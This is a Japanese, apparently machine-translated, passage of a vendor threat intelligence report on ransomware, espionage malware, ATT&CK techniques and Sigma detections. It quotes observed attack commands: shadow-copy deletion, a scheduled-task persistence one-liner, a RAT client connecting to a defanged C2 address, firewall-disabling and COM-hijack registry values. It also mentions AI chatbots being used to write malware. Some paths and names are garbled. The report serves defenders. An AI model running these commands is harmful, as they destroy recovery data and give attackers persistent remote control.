エネルギー産業のインフラは、産業制御システム(ICS)や監視制御・データ収集(SCADA)装置を含む複雑な OT に依存しており、これらの装置は外部の脅威から保護されなければならない。エネルギー OT の脆弱性は比較的まれであるが、この報告期間には、米国の電力・ガス・インフラに対する巧妙な攻撃があり、これらのシステムが不可解なものではないことを示している。例えば、この期間中、ロシアにリンクしたマルウェア PIPEDREAM が、米国各地の電力・天然ガス・インフラにおけるICS36の侵害を試みました。

物理的なインフラへの脅威に加え、エネルギー産業における事業運営も一般的な標的であり、この注目度の高い業界の組織は、OTとITインフラの両方を保護しなければならない。

注目すべき脅威行為者と武器

本レポートで取り上げた注目すべき脅威行為者と武器は以下の通りである。

APT28/Sofacy

Sofacyとしても知られるAPT28は、ロシア政府に代わって活動していると思われる、高度な技術と豊富なリソースを持つサイバースパイグループである。少なくとも2007年から活動しており、政府、軍事、防衛請負業者、エネルギー企業など幅広い分野を標的としています。APT28は、Operation Pawn StormやOperation Sofacyなど、さまざまなAPTキャンペーンに関連しています。同グループは、Sednit(SofacyまたはX-Agentとしても知られる)、Komplex、Zebrocyなど、さまざまなカスタムメイドのマルウェアや一般公開されているマルウェアを使用しており、ターゲットへの最初のアクセスを獲得するためにスピアフィッシングやソーシャルエンジニアリングの戦術を使用することが知られています。

津波/Linuxバックドア

Tsunami Linux Backdoorマルウェアは、侵害されたマシンにリモートアクセスするために一般的に使用されています。Tsunamiに関連する特定のグループもありますが(TeamTNT37など)、他のサイバー犯罪者にも使用されています。このマルウェアがインストールされると、攻撃者は感染したシステム上で任意のコマンドを実行したり、ファイルをアップロードしたりダウンロードしたり、シェルスクリプトを実行したりできるようになります。

XOR DDoS Linuxマルウェア

2014年に初めて発見されたXOR DDoSは、洗練されたマルチベクトル分散型サービス妨害(DDoS)攻撃を仕掛ける能力で知られるLinuxトロイの木馬です。XOR DDoSは、脆弱性やデフォルトのログイン認証情報、または古いソフトウェアの脆弱性を悪用してシステムに感染します。インストールされると、このマルウェアはC2インフラストラクチャを使用して、感染したマシンのボットネットと通信し、DDoS攻撃を仕掛けます。さまざまなサイバー犯罪者がXOR DDoSを利用してサーバーやウェブサイトへの標的型攻撃を仕掛けており、このマルウェアはIoTデバイス、特にLinux上で動作するデバイスを標的とする増加傾向にあります。

プラグエックス

PlugXは、攻撃者が感染したシステムを制御し、機密データの流出やユーザー活動の監視など、さまざまな悪意のある活動を行うことを可能にするRATです。攻撃者は多くの場合、PlugXをキーロガーやランサムウェアなどの他のマルウェアと組み合わせて使用し、感染したシステム上でさまざまな悪意のある活動を行います。PlugXはステルス機能を備えているため、システムの検出や駆除が困難であることが特徴です。このマルウェアは、フィッシングメール、ドライブバイダウンロード(同意なしにプログラムがインストールされる)、ソフトウェアの脆弱性の悪用など、複数の手法で拡散します。マルウェアがシステムに感染すると、リモートのC2サーバーへの接続を確立し、攻撃者が感染したシステムを遠隔操作できるようにします。

PlugXは長年にわたり、APT10、APT17、APT27を含む複数の脅威行為者によって使用されてきました。また、Emissary Panda、Deep Panda、KHRATなどのサイバー犯罪組織もこのマルウェアを使用しています。PlugXは、政府機関、防衛関連企業、ヘルスケア、金融、テクノロジーなどさまざまな分野で活動する企業に対する標的型攻撃で使用されています。

メーター

BlackBerry Threat Research and Intelligence チームは、Meterpreter ペイロードによる複数の侵入の試みを発見しました。Meterpreterは、攻撃者が侵害されたシステムを制御し、任意のコマンドを実行するために使用する強力なポストエクスプロイトツールです。Meterpreterペイロードは、サイバー犯罪や敵対者のシミュレーション・アプリケーションに関連することが多く、国家が支援する攻撃にも使用されています。Cobalt StrikeとMeterpreterは、サイバー犯罪関連攻撃と国家主導型攻撃の境界線を曖昧にするためにしばしば使用される。このツールは、APT41、FIN6、FIN7、FIN10、FIN11、GCMAN、MuddyWater、Silence、Turlaを含む多様な脅威グループによって広く使用されている。

レッドライン

サイバー犯罪者は、侵害されたシステムから貴重な情報を収集するために、RedLine infostealerを頻繁に展開しています。このマルウェアは多くの攻撃で確認されており、特定の脅威行為者に直接起因するものではありません。データの窃取に加え、このツールは、ネットワーク侵入のための初期アクセスを容易にするためにも一般的に使用され、その後、IABサービスやその他のアンダーグラウンドマーケットプレイスを通じて販売されます。RedLineを利用した侵入が成功すると、最初の侵入の影響を増幅させるような攻撃(ランサムウェアなど)が続くことがよくあります。

SEOポイズニング

検索エンジン最適化(SEO)とは、ウェブサイトが一般的な検索エンジンの検索結果リストで上位に表示されるように設計された一連のテクニックのことです。SEOポイズニングでは、悪意のあるウェブページを最適化し、あたかもベンダーのような信頼できるソースによって公開されているかのように検索結果ページの上位に表示させます。正規のWebサイトの評判を「借用」することで、ポイズニングされたサイトは被害者をおびき寄せ、システムが攻撃されるページにアクセスさせます。SEOポイズニングは、この報告期間中、特にヘルスケア業界で増加し、今後も拡大すると予想されています。

最も効果的な攻撃

ESXiArgsランサムウェア、パッチ未適用のVMware ESXi Linuxサーバーを全世界でノックアウト

パッチの適用されていないVMware ESXiサーバを標的とした新たなランサムウェアの大規模な発生に関する最初の報告38は、2023年2月初旬にオンラインで始まった。フランスに端を発し39 、急速に世界中に広がったこのランサムウェアは、初日だけで数千台のサーバを暗号化したとする報告もあります。

この新しいランサムウェアの背後にいる脅威者は、インターネットに面したVMware ESXiサーバーの2年前の脆弱性(CVE-2021-2197440)を悪用して侵入し、ランサムウェアを展開しました。この攻撃を受けたESXiのバージョンは以下の通りです:

  • ESXi650-202102101-SG以前のESXiバージョン6.5.x
  • ESXi670-202102401-SG以前のESXiバージョン6.7.x
  • ESXiバージョン7.x以前のESXi70U1c-17325551

このランサムウェアのコンポーネントには、ELFファイル暗号化プログラムと、暗号化プログラムの実行を含む実行チェーンを調整するために設計されたencrypted.shシェルスクリプトが含まれていた。

実行すると、このマルウェアはVMXの設定ファイル名を変更し、実行中のVMXプロセスをすべて終了させ、拡張子が.vmx、.vmxf、.vmsd、.nvram、.vmdkのファイルを特定して暗号化しました。その後、マルウェアはオリジナルを削除しました。

次にこのマルウェアは、2.092716ビットコイン(BTC)という、一見任意とも思える金額を要求する身代金要求書を投下した。そのメモによると、3日以内に支払われなければ、データは公開されるとのことだった。

このベンダーは、2年前の2021年2月にCVE-2021-21974の脆弱性に対するパッチを発行している。この攻撃は、最新のパッチ管理プログラムの重要性を浮き彫りにし、Linuxベースのシステムが攻撃に対して脆弱であり、脅威行為者にとってますます魅力的な標的になっていることを示している。

DarkBitランサムウェア、コマンドラインオプションと最適化された暗号化ルーチンでイスラエルを標的に

2月中旬、テクニオン・イスラエル工科大学はDarkBitと呼ばれる新種のランサムウェアの攻撃を受けた。脅威の主体は地政学的な動機を持っているようで、身代金要求のメモには反政府的、反イスラエル的なメッセージのほか、当時行われていた技術者のレイオフに関する発言も含まれていた。

このランサムウェアはGolangで書かれており、未知の感染ベクターを使用して、暗号化から除外するファイルタイプ、ランサムノート、分割暗号化のために大きなファイルを分割する指示など、マルウェアが従う特定のパラメータを含む埋め込み設定ファイルを展開した。

このマルウェアは、より高速な暗号化ルーチンのためのオプションのマルチスレッド化など、攻撃フローをカスタマイズするためのコマンドラインオプションを使用して実行することもできる。実行されると、マルウェアは以下の呼び出しを実行します:

- "vssadmin.exe delete shadow /all /Quiet"

このコマンドは、シャドウコピーを削除し、復旧作業を妨げ、ホストマシン上の標的となるファイルタイプを特定し、AES-256で暗号化し、拡張子.Darkbitを付加する。

RECOVERY_DARKBIT.txtと題された身代金要求のメモが、被害に遭ったすべてのディレクトリに投下され、身代金の支払い方法が記載されていた。このメモには、48時間以内に身代金が支払われない場合は30%のペナルティが追加され、5日以内に支払われない場合はデータが流出すると記載されていた。

身代金要求の手紙の文言や、脅威行為者のソーシャルメディアやウェブサイト上の同様のコメントから、この攻撃は不満を持つ従業員、従業員のグループ、またはハクティビストの仕業であることが示唆される。

未知の脅威者NewsPenguinがパキスタンを標的に高度なスパイ活動を展開

Blackberry Threat Research and Intelligenceチームは最近、カスタム・フィッシング・ルアーでパキスタンを拠点とする組織を標的にする未知の脅威行為者、NewsPenguinに関する調査結果を発表した

このルアーは、2023年2月10~12日に開催されるパキスタン国際海事エキスポ&コンファレンスをテーマにしており、コンファレンスの出展者マニュアルを装った兵器化されたWord文書が添付されていました。この文書は、リモートテンプレートインジェクション技術を使用し、悪意のあるマクロを埋め込んで、感染チェーンの次の段階を取得し、最終的に最終的なペイロードであるupdates.exeに導きました。

これまで文書化されていなかったこのスパイ活動ツールには、アンチ解析、アンチサンドボックス、情報窃盗など、さまざまな機能が含まれている:

  • ホスト・ハードディスク・ドライブのサイズの確認
  • ホストに10GB以上のRAMがあるかどうかの判断
  • GetTickCountを使用した稼働時間の特定
  • サンドボックスで動作しているか、仮想マシンで動作しているかの判断

インストールされると、マルウェアはチェックインし、12文字の文字列識別子を介してハードコードされたC2サーバーに侵害されたホストを登録します。ホストはその後、攻撃者からの指示を一連の組み込みコマンドとして受け取ることができる。コマンドには以下のようなものがある:

  • プロセスおよびホスト情報の特定とリストアップ
  • ホスト上のファイルとディレクトリを特定し、コピー、削除、移動、および/または変更する。
  • ポータブル実行可能ファイルの実行
  • プロセス(自身を含む)の終了
  • 被害者のファイルをアップロード(流出)し、追加のマルウェアを含む可能性のあるファイルをダウンロードする。

さらに、このマルウェアは、コマンドを発行する間にちょうど5分間待機する。これは、C2通信に関連するノイズを最小限に抑え、セキュリティや検知メカニズムに検知されないようにするのに役立つ可能性がある。

標的となったイベントはパキスタン海軍が主催し、海洋・軍事技術に焦点を当てたものであったことから、この新たな脅威行為者は、金銭的な目的ではなく、情報窃取やスパイ活動を目的としていた可能性があります。私たちは今後もこのグループの活動を追跡・監視していきます。

ガマレドン、テレグラムでウクライナの組織を標的に

Gamaredon(別名ACTINIUM)は、ウクライナの個人や団体を10年にわたり標的にしてきた、公に帰属する国家支援のロシア系APTグループである。

新年早々、BlackBerry Threat Research and Intelligence チームは、Gamaredonの新たなキャンペーンに関する調査結果を発表した。このキャンペーンでは、同グループが多段階の実行チェーンの一部として、人気の高いメッセージングアプリTelegramを活用していた。Telegramを使用することで、キャンペーンの活動は通常のネットワークトラフィックに紛れ込み、検知されずに残りました。

このキャンペーンの感染経路は、あたかも本物のウクライナの政府機関から発信されたかのように見せかけた、ロシア語やウクライナ語で書かれた兵器化された文書が添付された一連の高度に標的化されたフィッシング・ルアーでした。この文書には、感染したWordファイルを通じてコードの実行を可能にするCVE-2017-019941の悪用などのリモートテンプレートインジェクション技術が採用されていました。悪意のある文書が開かれると、攻撃の次の段階が始まる。

ウクライナのIPアドレスを持つターゲットだけが影響を受けるように、ジオフェンシングが使用された。ターゲットがウクライナにいることが確認されると、新しい悪意のあるIPアドレスにつながるハードコードされたTelegramアカウントに接続するスクリプトがダウンロードされた。各Telegramアカウントは、定期的に新しいIPアドレスを展開し、次の段階のペイロードを提供する新しいURLを構築した。この構造により、グループは、従来のセキュリティ・メカニズムでは検出が困難なまま、インフラを動的に更新することができた。

我々はクリミアで活動するノードを追跡し、少なくとも2022年春から活動していることを突き止めた。

コロンビアの司法、金融、公共、法執行機関を狙うブラインド・イーグル

2023年2月下旬、BlackBerry Threat Research and Intelligenceチームは、南米の脅威グループBlind Eagle(APT-C-3642)に中程度の信頼度で起因するとされる新たなキャンペーンを目撃した。Blind Eagleは2019年から活動を開始し、コロンビア、エクアドル、チリ、スペインの産業を標的にしています。

このキャンペーンの全体的な目標は、AsyncRATコモディティマルウェアを投下し、展開することだった。このグループは、特に税務機関など、さまざまな政府機関になりすます。最初の攻撃は、被害者が信用できるフィッシング・リンクに引っかかり、手の込んだマルチパートの実行チェーンが始まるところから始まることが多い。

Blind Eagleのキャンペーンでは、人気のソーシャルプラットフォームDiscordのコンテンツ配信ネットワークが悪用され、マルウェアがホストされた(Discordの機能は、多くの脅威アクターやサイバー犯罪グループによって武器化されている)。

その他の注目すべき攻撃

黒猫ギャング、アイルランドの大学を標的に

2023年2月初旬、BlackCat(別名ALPHV)というランサムウェア集団が、アイルランドのコークとケリーにキャンパスを持つ学生数約18,000人の大学、Munster Technological Universityに対してサイバー攻撃を開始した。未知の感染経路を使用したこのグループは、同大学の6つのキャンパスのうち4つのシステム43に侵入し、暗号化した。その直後、この攻撃で盗まれたとされる約6GBのデータが、同グループのダークウェブ・リーク・サイトに掲載された。

ロックビット

報告期間中、ロックビットは最も活発なRaaSプロバイダーであり、1月だけで、既知のランサムウェア攻撃165件のうち50件がロックビットに起因するものでした44。注目すべき攻撃は以下のとおりです:

  • 2022年12月18日、このグループはHospital for Sick Children(通称SickKids)を攻撃した。攻撃から2週間後、ロックビットはメンバーが医療機関を攻撃することでルールを破ったと主張し、謝罪し、無料の復号化ツールを公開した。この2週間の間に、患者の検査や画像診断が遅れ、電話回線が使えなくなり、職員の給与計算システムが停止した。
  • 2022年12月25日、このグループはポルトガル最大級の港であるリスボン港管理局(APL)に対して攻撃を開始した。
  • 2023年1月27日、研究者45はLockBit Greenと名付けられた新しい亜種に関する情報を共有しました。その直後、他の研究者は、この新しい亜種がContiベースの流出したソースコードを使用していることを突き止めました。
  • 2月上旬、このランサムウェアグループは、ロイヤルメール(英国の多国籍郵便サービス)に対する攻撃の背後にいると主張し、データを漏洩サイトで公開すると述べた。流出サイトは2023年2月23日に公開され、2023年3月下旬の時点でもデータは公開されていた。

Microsoft OneNoteの悪用

かつて脅威者は、感染したマクロを含むMicrosoft®Office文書を頻繁に配布し、被害者が文書を開くと自動的にマクロが実行されるようにしていました。2022年半ば、マイクロソフトはOfficeマクロの自動実行を無効化し、こうした攻撃は成功しにくくなりました。その結果、脅威当事者は、一般的なワークプレイスソフトウェアを悪用する新たな方法を探しました。

この報告期間中、マルウェアやランサムウェアの配布に、Microsoft® OneNote の添付ファイル46(Office365®スイートのデジタルノートアプリケーション)が使用されるケースが急増しています。攻撃者は、Windows 実行可能ファイル、バッチファイル、Visual Basic スクリプト、HTML アプリケーションファイルなどのペイロードを含む OneNote の添付ファイルをフィッシングやマルスパムキャンペーンに追加します。

被害者が悪意のあるOneNoteの添付ファイルを開くと、感染の次の段階が発生し、一般的なコモディティマルウェアが頻繁にダウンロードされ、展開されます。OneNoteの添付ファイルを悪用することが知られている脅威主体には、Agent Tesla、AsyncRAT、IcedID、FormBook、RemcosRAT、RedLine、Qakbotなどがあります。

MITREの共通テクニック

BlackBerry Threat Research and Intelligence チームは、侵入とマルウェアを MITREATT&CK®の戦術とテクニックにマッピングしています。次の表は、この報告期間中に確認された上位 20 のテクニックを示しています。MITRE テクニックの全リストは、BlackBerry Threat Research and Intelligence 公開 GitHub で入手できます。
技術名 テクニックID 戦術
システム情報の発見
T1082
ディスカバリー
プロセス・インジェクション
T1055
防御回避
仮想化/サンドボックス回避
T1497
防御回避
セキュリティ・ソフトウェアの発見
T1518.001
ディスカバリー
マスカレード
T1036
防御回避
リモート・システム・ディスカバリー
T1018
ディスカバリー
アプリケーション層プロトコル
T1071
指揮統制
ファイルとディレクトリの検出
T1083
ディスカバリー
非アプリケーション層プロトコル
T1095
指揮統制
プロセス・ディスカバリー
T1057
ディスカバリー
DLLサイドローディング
T1574.002
永続性
コマンドとスクリプトのインタープリター
T1059
実行
入力キャプチャ
T1056
コレクション
ソフトウェア梱包
T1027.002
防御回避
ツールの無効化または変更
T1562.001
防御回避
ルンドル32
T1218.011
防御回避
暗号化チャンネル
T1573
指揮統制
難読化されたファイルまたは情報
T1027
防御回避
レジストリの実行キー/スタートアップフォルダ
T1547.001
永続性
アプリケーション・ウィンドウの発見
T1010
ディスカバリー
テクニックID
システム情報の発見
T1082
プロセス・インジェクション
T1055
仮想化/サンドボックス回避
T1497
セキュリティ・ソフトウェアの発見
T1518.001
マスカレード
T1036
リモート・システム・ディスカバリー
T1018
アプリケーション層プロトコル
T1071
ファイルとディレクトリの検出
T1083
非アプリケーション層プロトコル
T1095
プロセス・ディスカバリー
T1057
DLLサイドローディング
T1574.002
コマンドとスクリプトのインタープリター
T1059
入力キャプチャ
T1056
ソフトウェア梱包
T1027.002
ツールの無効化または変更
T1562.001
ルンドル32
T1218.011
暗号化チャンネル
T1573
難読化されたファイルまたは情報
T1027
レジストリの実行キー/スタートアップフォルダ
T1547.001
アプリケーション・ウィンドウの発見
T1010
戦術
システム情報の発見
ディスカバリー
プロセス・インジェクション
防御回避
仮想化/サンドボックス回避
防御回避
セキュリティ・ソフトウェアの発見
ディスカバリー
マスカレード
防御回避
リモート・システム・ディスカバリー
ディスカバリー
アプリケーション層プロトコル
指揮統制
ファイルとディレクトリの検出
ディスカバリー
非アプリケーション層プロトコル
指揮統制
プロセス・ディスカバリー
ディスカバリー
DLLサイドローディング
永続性
コマンドとスクリプトのインタープリター
実行
入力キャプチャ
コレクション
ソフトウェア梱包
防御回避
ツールの無効化または変更
防御回避
ルンドル32
防御回避
暗号化チャンネル
指揮統制
難読化されたファイルまたは情報
防御回避
レジストリの実行キー/スタートアップフォルダ
永続性
アプリケーション・ウィンドウの発見
ディスカバリー

最もよく使われる上位3つのテクニックは、前回の報告期間と変わらず、これらの一般的なタイプの攻撃に対する検知メカニズムを開発する必要性を強調している。

すべてのテクニックに対する対策の完全なリストは、私たちの公開GitHubにあります。

検出技術

BlackBerry Threat Research and Intelligence チームは、すべての侵入を詳細に分析し、ファイルイベントやレジストリキーの変更、プロセス、パーミッション、実行可能ファイル、スケジュールされたタスク、サービス、その他あらゆる要素を含む OS のアクティビティに関する情報を収集します。

チームは、Cylance Endpoint Security ソリューションが停止したサンプルのすべての動作を、公開されているシグマ・ルール47 にマッピングしました。図 6 は、この報告期間中にサンプルの実行中にアクティブ化されたシグマ・ルールの上位 10 個を示し、その後に各シグマ・ルールと関連する MITRE ATT&CK テクニックおよび戦術について説明しています。

検出技術
図6:本レポートのために分析された行動で検出されたシグマ・ルールのトップ10。
シグマ・ルール 説明 MITRE ATT&CK テクニック MITRE ATT&CK タクティクス
実行ファイルによる実行ファイルの作成
他の実行ファイルによる実行ファイルの作成を検出する。
能力を開発する:マルウェア - T1587.001
資源開発
Wow6432Node CurrentVersion オートランキーの変更
レジストリの自動開始拡張ポイント(ASEP)の変更を検出する。
ブートまたはログオン時の自動起動の実行:レジストリの実行キー / スタートアップフォルダ - T1547.001
永続性
Sysnativeフォルダを使用したプロセス作成
Sysnative フォルダを使用するプロセス作成イベントを検出 (Cobalt Strike のスポーンに共通)
プロセス・インジェクション - T1055
防御回避
特権を持つユーザーのログオン
管理者グループまたは権限と同様の特別なグループまたは権限を持つユーザーのログオンを検出します。
有効なアカウント - T1078
特権のエスカレーション
不審なフォルダからのプロセス開始
通常使用されない、またはほとんど使用されないディレクトリでのプロセス開始を検出します。
ユーザー実行 - T1204
実行
CurrentVersionオートランキーの変更
レジストリの自動開始拡張ポイント(ASEP)の変更を検出する。
ブートまたはログオン時の自動起動の実行:レジストリの実行キー / スタートアップフォルダ - T1547.001
永続性
レジストリからMicrosoft Defender Firewallを無効にする
ネットワーク利用を制限する制御をバイパスするために、システムのファイアウォールを無効にしたり、変更したりすることを検知する。
防御の障害:システムファイアウォールの無効化または変更 - T1562.004
防御回避
PowerShell スケジュールタスクの作成
Windows タスクスケジューラを悪用して、悪意のあるコードの初期実行または反復実行をスケジュールする可能性を検出します。
スケジュールされたタスク/ジョブスケジュールされたタスク - T1053.005
永続性
オーディナルによる不審な電話
rundll32.dllエクスポート内のDLLの不審な呼び出しを順序値で検出します。
システムバイナリのプロキシ実行:Rundll32 - T1218.011
防御回避
Windowsサービスの停止
停止するWindowsサービスを検出する
サービス・ストップ - T1489
インパクト
説明
実行ファイルによる実行ファイルの作成
他の実行ファイルによる実行ファイルの作成を検出する。
Wow6432Node CurrentVersion オートランキーの変更
レジストリの自動開始拡張ポイント(ASEP)の変更を検出する。
Sysnativeフォルダを使用したプロセス作成
Sysnative フォルダを使用するプロセス作成イベントを検出 (Cobalt Strike のスポーンに共通)
特権を持つユーザーのログオン
管理者グループまたは権限と同様の特別なグループまたは権限を持つユーザーのログオンを検出します。
不審なフォルダからのプロセス開始
通常使用されない、またはほとんど使用されないディレクトリでのプロセス開始を検出します。
CurrentVersionオートランキーの変更
レジストリの自動開始拡張ポイント(ASEP)の変更を検出する。
レジストリからMicrosoft Defender Firewallを無効にする
ネットワーク利用を制限する制御をバイパスするために、システムのファイアウォールを無効にしたり、変更したりすることを検知する。
PowerShell スケジュールタスクの作成
Windows タスクスケジューラを悪用して、悪意のあるコードの初期実行または反復実行をスケジュールする可能性を検出します。
オーディナルによる不審な電話
rundll32.dllエクスポート内のDLLの不審な呼び出しを順序値で検出します。
Windowsサービスの停止
停止するWindowsサービスを検出する
MITRE ATT&CK テクニック
実行ファイルによる実行ファイルの作成
能力を開発する:マルウェア - T1587.001
Wow6432Node CurrentVersion オートランキーの変更
ブートまたはログオン時の自動起動の実行:レジストリの実行キー / スタートアップフォルダ - T1547.001
Sysnativeフォルダを使用したプロセス作成
プロセス・インジェクション - T1055
特権を持つユーザーのログオン
有効なアカウント - T1078
不審なフォルダからのプロセス開始
ユーザー実行 - T1204
CurrentVersionオートランキーの変更
ブートまたはログオン時の自動起動の実行:レジストリの実行キー / スタートアップフォルダ - T1547.001
レジストリからMicrosoft Defender Firewallを無効にする
防御の障害:システムファイアウォールの無効化または変更 - T1562.004
PowerShell スケジュールタスクの作成
スケジュールされたタスク/ジョブスケジュールされたタスク - T1053.005
オーディナルによる不審な電話
システムバイナリのプロキシ実行:Rundll32 - T1218.011
Windowsサービスの停止
サービス・ストップ - T1489
MITRE ATT&CK タクティクス
実行ファイルによる実行ファイルの作成
資源開発
Wow6432Node CurrentVersion オートランキーの変更
永続性
Sysnativeフォルダを使用したプロセス作成
防御回避
特権を持つユーザーのログオン
特権のエスカレーション
不審なフォルダからのプロセス開始
実行
CurrentVersionオートランキーの変更
永続性
レジストリからMicrosoft Defender Firewallを無効にする
防御回避
PowerShell スケジュールタスクの作成
永続性
オーディナルによる不審な電話
防御回避
Windowsサービスの停止
インパクト

シグマ・ルール実行可能ファイルによる実行可能ファイルの作成

Sysmon Event ID 11 FileCreateに関連するこの攻撃は、別の.exeファイルによって.exeファイルが作成されるというものです。観察されたバイナリが作成されたパスの一部は以下のとおりです:

  • > C:\Users\<user>\AppData\Local\Temp\
  • > C:\Users\<user>\Desktop\
  • > C:\Users\<user>\Downloads\
  • > C:\<custom_path>\
  • > C:³ Files

シグマルールWow6432Node CurrentVersion オートランキーの変更

Sysmon Event ID 13 Registry Value Setに関連するこの攻撃には、レジストリ内の自動起動拡張ポイント(ASEP)の変更が含まれます。主な自動実行レジストリキーは以下のとおりです:

  • HKEY_CURRENT_USER
  • HKEY_CURRENT_USER
  • HKEY_LOCAL_MACHINE
  • HKEY_LOCAL_MACHINE

自動実行キーは、既存のWindowsアイテムと似た名前で作成することができる。例としては以下のようなものがある:

  • ウィンドウズ設定
  • マイクロソフトWindowsドライバ
  • エクスプローラー
  • Windowsサービスのホストプロセス

侵入の種類(特定のパスでのバイナリの実行やAppDataフォルダ内のスクリプトなど)によって、レジストリキーの値が異なる場合があります。

シグマのルールレジストリ経由でMicrosoft Defenderファイアウォールを無効にする

Sysmon Event ID 13 Registry Value Setに関連するこれらの攻撃は、PowerShell、reg.exe、またはAPI Callsなどのツールを使用して、Microsoft Windows Defenderを無効にするためにレジストリを変更します。これを達成するために、脅威行為者は特定の値で次のレジストリキーを変更します。例えば

  • >HKLM System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\EnableFirewall
  • > DWORD (0x00000000)

その他の脅威行動

この報告期間中、脅威行為者が使用するサンプルに新たな挙動が確認された。

プロセス: cmd.exe

この脅威の動作は、cmd.exeを使用して、同じ感染内で7つの異なるサブプロセスを起動します。

  • sc.exe(起動と問い合わせのために2回起動される)
  • ピングエグゼ
  • findstr.exe
  • schtasks.exe(削除、作成、実行のために3回起動される)

以下は、cmd.exeを悪用する悪質なコードの例です。

  • > cmd /c start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&(schtasks /delete /TN Ddrivers /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Ddrivers /tr ┣"cmd.exe /c c:┣Windows┣SysWOW64┣drivers┣svchost.exe"&schtasks /run /TN Ddrivers)

プロセス: cvtres.exe

この脅威の動作は、RATクライアントを使用してサーバーへの接続を確立します。以下は、cvtres.exeを悪用する悪質なコードの例です:

  • > ¦"C:¦Windows¦Microsoft.NET¦Framework¦v4.0.30319¦cvtres.exe" HiddenEyeZ_Client 191.101.30[.]201 8880 NmWblLaOd

プロセスAutoIt3.exe

この脅威の動作は、AutoIt3.exe(AutoIt v3スクリプト言語のコンポーネント)を使用して、悪意のある目的を持つスクリプトを実行します。たとえば、COMハイジャック(正規のシステムコンポーネントへの参照を悪意のあるコードへの参照に置き換える)によって永続性を実現しようとするAutoItスクリプト(一般的に.au3拡張子を使用)が確認されています。脅威当事者は、COMハイジャックを使用して、悪意のあるDLLを含む新しいエントリを作成し、そのエントリが後で実行されるようにします。例えば

  • > レジストリ SetValue
  • > HKCR\\CLSID\\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\\InprocServer32\\(Default)
  • > C:\\Users\\<user>\\AppData\\Local\\Temp\\JSAMSIProvider64.dll

予想

Global Threat Intelligence Report の各号には、BlackBerry Threat Research and Intelligence チームによる今後 12 ヶ月間の予測が含まれています。本レポートからは、過去の予測の分析に加え、現在の報告期間に基づく新たな予測や更新された予測を掲載します。

予想の再検討

前回のレポートでの予測の多くは、今回の報告期間中に的中した。

我々の予想

ロシアのウクライナ侵攻の主な特徴は、ウクライナの軍事・民間インフラに対するサイバー攻撃である。敵対行為が続けば、このような標的型サイバー攻撃のパターンが繰り返される可能性が高い。

成果だ:

ウクライナ紛争が続く中、同地域のデジタルおよび物理的な重要インフラに対する攻撃も続いている。2022年11月のEUエネルギー相との会合48で、ウクライナのガルシュチェンコ・エネルギー相は、民間インフラの大部分が損傷または破壊され、攻撃が止んでいないことを示唆した。

我々の予想

病院や医療機関を標的にした攻撃を含むランサムウェア作戦は、特にウクライナを支援したり、ウクライナに資金を提供したりしている国々では今後も続くだろう。

成果だ:

今期もランサムウェア攻撃は続いているが、金銭的な動機以外のものは不明である。著名なランサムウェア・グループであるLockBitは、この報告期間に活発に活動し、合計1,500人以上の被害者を攻撃した可能性がある。このグループは、保健・医療組織を標的にすることに何の躊躇もないようで、被害者の中には米国を拠点とする医療プロバイダーも含まれていた。

また、BlackCatランサムウェアの運営者による攻撃も増加しており、主に米国を拠点とする被害者を標的としています。さらに、ESXiArg ランサムウェアは、パッチの適用されていない脆弱なシステム数百台に影響を及ぼし、この報告期間中に懸念の原因となりました。

我々の予想

重要インフラへのサイバー攻撃は今後も続くだろう。AIは攻撃の自動化だけでなく、高度なディープフェイク攻撃の開発にもますます利用されるようになるかもしれない。

成果だ:

重要なインフラストラクチャは、常に金銭的および政治的な動機に基づく脅威行為者のターゲットであり、全体的な脅威の状況におけるディープフェイクの使用は、重要な牽引力となっています。BlackBerry Threat Research and Intelligenceチームは、マルウェアが混入されたクラックされたソフトウェアを宣伝するために、ディープフェイクや類似の策略を活用する複雑な暗号通貨詐欺を観察してきました。

新規・更新予想

今後1年間の見通しは以下の通り。

ウクライナに対するサイバー攻撃の継続的増加

紛争が続く中、ウクライナに対するサイバー攻撃も続くだろう。ウクライナ国家サイバー保護センターは、2022年を通じてサイバー攻撃49が前年比で約3倍に増加し、ロシアを拠点とするIPアドレスを発信元とする攻撃が26%50と大幅に増加したと報告している。

2023年1月、ESETは、悪名高いSandworm Groupに起因するSwiftSlicerと名付けられた新しいマルウェアワイパーを文書化しました。このGolangでコンパイルされたマルウェアは、ワイパーの長いライン51の中で最新のもので、ターゲット・ネットワーク上に展開されるとデータを破壊します。

サイバー攻撃はロシアの軍事作戦の要素としてよく知られている52 ので、ウクライナに対する攻撃は今後も続く可能性が高い。

サイバー犯罪者によるChatGPTの悪用

対話型AIチャットボットChatGPT53は、2022年11月に世界中でリリースされた。サイバー犯罪者がChatGPTを詐欺や基本的なマルウェアの作成に使用する可能性をテストし、議論しているという最初の報告54が2022年12月に始まりました。2023年1月には、研究者55が、ChatGPTがポリモーフィック機能を備えた複雑な悪意のあるコードを作成できることを実証しました。

ChatGPTのようなAIを搭載したボットがより高度で一般的になるにつれ、その機能が悪意のある目的に悪用されることは避けられません。このような増大する脅威に対する防御には、予防と検出の機能だけでなく、効果的な脅威インテリジェンスが必要です。

サプライチェーンへの攻撃は脅威であり続ける

この報告期間では、製造業と医療業界を狙った商品マルウェアによる攻撃が大半を占めました。これらのコモディティ情報窃取ツールは、データ窃取や、ネットワーク侵入を容易にするためのアクセス認証情報を取得するためのツールとして使用されていました。この種のアクセスは、IABサービスを通じて頻繁に販売されており、情報窃取者のログは、しばしばアンダーグラウンドのマーケットプレイスで販売されています。多くの場合、侵入に成功すると、ランサムウェアの展開など、最初の侵入の影響を増幅させるような後続の攻撃が発生する。

セキュリティへの取り組みが強化されているにもかかわらず、サプライチェーン・パートナーを標的としたサイバー攻撃は、今後3カ月間も重大な脅威であり続けるだろう。すべての業界がサプライチェーン攻撃のリスクにさらされている一方で、製造業は、金融資産、特許、その他の知的財産を有するため、金銭的動機に基づく脅威行為者や国家に支援された行為者にとって特に魅力的な標的である。

自動車業界のサプライチェーンを標的とした最近のランサムウェア攻撃は、こうした攻撃が製造業全体に及ぼす潜在的な影響を示している。サプライチェーンの混乱は、標的となった企業だけでなく、業界のバリューチェーンにある他のすべての組織やシステムに影響を及ぼす。

ランサムウェアの展開を容易にするためにIABを利用するのと同様に、サプライチェーン攻撃は今後も続くと予想される。

結論

